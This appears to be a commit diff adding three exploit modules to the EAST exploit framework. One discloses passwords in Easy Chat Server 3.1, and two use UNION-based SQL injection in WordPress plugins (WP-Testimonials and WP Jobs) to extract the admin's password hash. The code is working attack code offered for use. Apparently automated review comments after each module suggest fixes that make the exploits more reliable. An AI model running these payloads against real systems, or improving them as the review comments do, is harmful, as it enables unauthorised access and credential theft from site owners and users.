Showing
3 changed files
with
317 additions
and
0 deletions.
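--- /dev/null
+++ b/Exploits/Web/efa_easy_chat_server_pd.py
@@ -0,0 +1,77 @@
+#! /usr/bin/env python
+# -*- coding: utf_8 -*-
+# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
+
+import sys
+import os
+import re
+import urllib2
+
+sys.path.append('./core')
+from Sploit import Sploit
+
+INFO = {}
+INFO['NAME'] = "efa_easy_chat_server_pd"
+INFO['DESCRIPTION'] = "Easy Chat Server 3.1 Password Disclosure"
+INFO['VENDOR'] = "http://echatserver.com"
+INFO['DOWNLOAD_LINK'] = 'http://echatserver.com/ecssetup.exe'
+INFO['LINKS'] = ['https://packetstormsecurity.com/files/142884/Easy-Chat-Server-3.1-Password-Disclosure.html']
+INFO["CVE Name"] = ""
+INFO["NOTES"] = """Registeration page 'register.ghp' allows disclosing ANY user's password. Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password."
+"""
+INFO['CHANGELOG'] = "15 Jun, 2017. Written by Gleg team."
+INFO['PATH'] = 'Exploits/Web/'
+
+# Must be in every module, to be set by framework
+OPTIONS = {}
+OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
+OPTIONS["PORT"] = 80, dict(description = 'Target port')
+OPTIONS["USER"] = 'admin', dict(description = 'Username')
+
+
+class exploit(Sploit):
+    def __init__(self, host = "", port = 0, logger = None):
+        Sploit.__init__(self, logger = logger)
+        self.name = INFO['NAME']
+        self.port = port
+        self.host = host
+        self.user = ''
+
+    def args(self):
+        self.args = Sploit.args(self, OPTIONS)
+        self.host = self.args.get('HOST', self.host)
+        self.port = int(self.args.get('PORT', self.port))
+        self.user = self.args.get('USER', 'admin')
+
+    def make_url(self, path = ''):
+        return 'http://{}:{}{}'.format(self.host, self.port, path)
+
+    def run(self):
+        self.args()
+        self.log("Attacking {}".format(self.host))
+
+        url = self.make_url('/register.ghp?username={}&password='.format(self.user))
+        try:
+            fd = urllib2.urlopen(url)
+            content = fd.read()
+        except Exception as e:
+            self.log(e)
+            self.finish(False)
+
+        result = re.findall('<INPUT type="password" name="Password" maxlength="30" value="(.+?)">', content)
+        if len(result) > 0:
+            self.log('Password: ' + result[0])
+            self.finish(True)
+        else:
+            self.log('User not Found')
+            self.finish(False)
+
+if __name__ == '__main__':
+    """
+    By now we only have the tool mode for exploit..
+    Later we would have standalone mode also.
+    """
+
+    print "Running exploit %s .. " % INFO['NAME']
+    e = exploit('', 80)
+    e.run()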
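Review bot: In `run`, the `except` branch logs the error and calls `self.finish(False)` but does not `return`, so unless `Sploit.finish` terminates the module (its implementation is not visible here) execution continues to the `re.findall(...)` call with `content` never assigned and dies with a NameError instead of the logged failure. Add `return` directly after `self.finish(False)` in the except branch, and give the request a bound, `fd = urllib2.urlopen(url, timeout=10)`, so an unresponsive host cannot hang the framework run. `self.user` is also interpolated into the query string raw; `urllib2.quote(self.user)` keeps a username containing `&`, `#` or spaces from corrupting the request without adding an import. The NOTES literal ends with a stray `"` before the closing triple quote and misspells "Registration".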
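--- /dev/null
+++ b/Exploits/Web/efa_wordpress_testimonials_sqli.py
@@ -0,0 +1,120 @@
+#! /usr/bin/env python
+# -*- coding: utf_8 -*-
+# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
+
+import sys
+import re
+import base64
+import urllib
+import urllib2
+import cookielib
+
+sys.path.append("./core")
+from Sploit import Sploit
+
+INFO = {}
+INFO['NAME'] = "efa_wordpress_testimonials_sqli"
+INFO['DESCRIPTION'] = "WP-Testimonials WordPress Plugin v.3.4.1 - Union Based SQL Injection"
+INFO['VENDOR'] = "http://www.sunfrogservices.com/web-programmer/wp-testimonials/"
+INFO['DOWNLOAD_LINK'] = ''
+INFO['LINKS'] = ['https://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-injection-sqli/']
+INFO["CVE Name"] = ""
+INFO["NOTES"] = """SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter."""
+
+INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team."
+INFO['PATH'] = 'Exploits/Web/'
+
+# Must be in every module, to be set by framework
+OPTIONS = {}
+OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
+OPTIONS["PORT"] = "80", dict(description = 'Target port')
+OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath')
+OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user')
+OPTIONS["PASSWORD"] = 'password', dict(description = 'Password')
+OPTIONS["SSL"] = False, dict(description = 'Use SSL')
+
+class exploit(Sploit):
+    def __init__(self, host="", port=0, logger=None):
+        Sploit.__init__(self, logger = logger)
+        self.name = INFO['NAME']
+        self.port = port
+        self.host = host
+        self.ssl = False
+        self.basepath = "/"
+        self.username = ''
+        self.password = ''
+
+    def args(self):
+        self.args = Sploit.args(self, OPTIONS)
+        self.host = self.args.get('HOST', self.host)
+        self.port = int(self.args.get('PORT', self.port))
+        self.basepath = self.args.get('BASEPATH', self.basepath)
+        self.username = self.args.get('USERNAME', self.username)
+        self.password = self.args.get('PASSWORD', self.password)
+        self.ssl = self.args.get('SSL', self.ssl)
+
+        self.cookiesjar = cookielib.CookieJar()
+        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar))
+        urllib2.install_opener(opener)
+
+    def make_url(self, path = ''):
+        return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)
+
+    def prot(self):
+        return self.ssl and 'https://' or 'http://'
+
+    def auth_wordpress(self, username, password):
+
+        url = self.make_url('/wp-login.php')
+        data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password)
+
+        fd = urllib2.urlopen(url)
+        init_cookie = fd.headers['Set-Cookie']
+
+        request = urllib2.Request(url, data)
+        request.add_header('Cookie', init_cookie)
+        fd = urllib2.urlopen(request)
+
+        power_cookie = ''
+        for k in self.cookiesjar:
+            power_cookie += k.name + '=' + k.value + ';'
+        return power_cookie
+
+
+    def run(self):
+        self.args()
+
+        cookies = self.auth_wordpress(self.username, self.password)
+        url = self.make_url('/wp-admin/admin.php?')
+
+        sql = 'page=sfstst_manage&mode=sfststedit&testid=' + urllib.quote('-1 UNION ALL SELECT NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL,NULL,NULL,NULL,NULL FROM wp_users where id=1 -- comment')
+
+        self.log('Begin extracting admin\'s credentials')
+        result = ''
+        try:
+            request = urllib2.Request(url + sql, headers = {'Cookie': cookies})
+            fd = urllib2.urlopen(request)
+            result = fd.read()
+            result = result.split('###')[1]
+        except Exception as e:
+            self.log(e)
+            self.log("Failed!")
+            self.finish(False)
+
+        if result:
+            self.log('Output format username:hash-password')
+            self.log('=' * 60)
+            self.log('End with: {}'.format(result))
+            self.log('=' * 60)
+            self.finish(True)
+
+        self.finish(False)
+
+if __name__ == '__main__':
+    """
+    By now we only have the tool mode for exploit..
+    Later we would have standalone mode also.
+    """
+    print "Running exploit %s .. " % INFO['NAME']
+    e = exploit("192.168.0.1", 80)
+    e.run()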
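Review bot: In `run`, the success path calls `self.finish(True)` and then falls through to the unconditional `self.finish(False)` at the end of the method, and the `except` branch likewise continues into the `if result:` check; unless `Sploit.finish` terminates execution (not visible here), every run ends by reporting failure and on an exception the module reports failure twice. Add `return` after each `self.finish(...)` inside `run`. In `auth_wordpress`, `username` and `password` are formatted into the POST body raw, so a password containing `&`, `+` or `%` is mangled and the login silently fails before the injection is even sent; wrap both in `urllib.quote(..., safe='')` in the `format` call. The injected query also hard-codes the `wp_` table prefix and `id=1`, so a site with a custom prefix yields only the generic "Failed!" — exposing the prefix as an OPTIONS entry would make the failure mode actionable.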
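--- /dev/null
+++ b/Exploits/Web/efa_wordpress_wp_jobs_sqli.py
@@ -0,0 +1,120 @@
+#! /usr/bin/env python
+# -*- coding: utf_8 -*-
+# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
+
+import sys
+import re
+import base64
+import urllib
+import urllib2
+import cookielib
+
+sys.path.append("./core")
+from Sploit import Sploit
+
+INFO = {}
+INFO['NAME'] = "efa_wordpress_wp_jobs_sqli"
+INFO['DESCRIPTION'] = "WordPress Plugin WP Jobs < 1.5 - SQL Injection"
+INFO['VENDOR'] = "http://www.intensewp.com/"
+INFO['DOWNLOAD_LINK'] = ''
+INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42172/']
+INFO["CVE Name"] = "CVE-2017-9603"
+INFO["NOTES"] = """SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress allows authenticated users to execute arbitrary SQL commands via the jobid parameter to wp-admin/edit.php"""
+
+INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team."
+INFO['PATH'] = 'Exploits/Web/'
+
+# Must be in every module, to be set by framework
+OPTIONS = {}
+OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
+OPTIONS["PORT"] = "80", dict(description = 'Target port')
+OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath')
+OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user')
+OPTIONS["PASSWORD"] = 'password', dict(description = 'Password')
+OPTIONS["SSL"] = False, dict(description = 'Use SSL')
+
+class exploit(Sploit):
+    def __init__(self, host="", port=0, logger=None):
+        Sploit.__init__(self, logger = logger)
+        self.name = INFO['NAME']
+        self.port = port
+        self.host = host
+        self.ssl = False
+        self.basepath = "/"
+        self.username = ''
+        self.password = ''
+
+    def args(self):
+        self.args = Sploit.args(self, OPTIONS)
+        self.host = self.args.get('HOST', self.host)
+        self.port = int(self.args.get('PORT', self.port))
+        self.basepath = self.args.get('BASEPATH', self.basepath)
+        self.username = self.args.get('USERNAME', self.username)
+        self.password = self.args.get('PASSWORD', self.password)
+        self.ssl = self.args.get('SSL', self.ssl)
+
+        self.cookiesjar = cookielib.CookieJar()
+        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar))
+        urllib2.install_opener(opener)
+
+    def make_url(self, path = ''):
+        return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)
+
+    def prot(self):
+        return self.ssl and 'https://' or 'http://'
+
+    def auth_wordpress(self, username, password):
+
+        url = self.make_url('/wp-login.php')
+        data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password)
+
+        fd = urllib2.urlopen(url)
+        init_cookie = fd.headers['Set-Cookie']
+
+        request = urllib2.Request(url, data)
+        request.add_header('Cookie', init_cookie)
+        fd = urllib2.urlopen(request)
+
+        power_cookie = ''
+        for k in self.cookiesjar:
+            power_cookie += k.name + '=' + k.value + ';'
+        return power_cookie
+
+
+    def run(self):
+        self.args()
+
+        cookies = self.auth_wordpress(self.username, self.password)
+        url = self.make_url('/wp-admin/edit.php?')
+
+        sql = 'post_type=job&page=WPJobsJobApps&jobid=' + urllib.quote('5 UNION ALL SELECT NULL,NULL,NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL FROM wp_users where id=1 -- comment')
+
+        self.log('Begin extracting admin\'s credentials')
+        result = ''
+        try:
+            request = urllib2.Request(url + sql, headers = {'Cookie': cookies})
+            fd = urllib2.urlopen(request)
+            result = fd.read()
+            result = result.split('###')[1]
+        except Exception as e:
+            self.log(e)
+            self.log("Failed!")
+            self.finish(False)
+
+        if result:
+            self.log('Output format username:hash-password')
+            self.log('=' * 60)
+            self.log('End with: {}'.format(result))
+            self.log('=' * 60)
+            self.finish(True)
+
+        self.finish(False)
+
+if __name__ == '__main__':
+    """
+    By now we only have the tool mode for exploit..
+    Later we would have standalone mode also.
+    """
+    print "Running exploit %s .. " % INFO['NAME']
+    e = exploit("192.168.0.1", 80)
+    e.run()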
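Review bot: `auth_wordpress` never verifies that the login succeeded: the response to the POST to `wp-login.php` is discarded and the cookie jar is serialized as-is, so with wrong credentials `run` sends the injection to `wp-admin/edit.php` unauthenticated, gets the login redirect back, and reports a generic "Failed!" from the `split('###')[1]` IndexError. After the POST, check the jar for the session cookie WordPress sets on a successful login, e.g. `if not any(c.name.startswith('wordpress_logged_in_') for c in self.cookiesjar): raise Exception('WordPress login failed')`, so a credential problem is reported as such. Copying `Set-Cookie` into a `Cookie` header by hand is redundant with the `HTTPCookieProcessor` installed in `args`, which already replays the jar, and `fd.headers['Set-Cookie']` raises KeyError if the initial GET sets no cookie. As in the sibling module, `run` continues into the trailing `self.finish(False)` after `self.finish(True)` unless `finish` terminates execution; add `return` after each `finish` call.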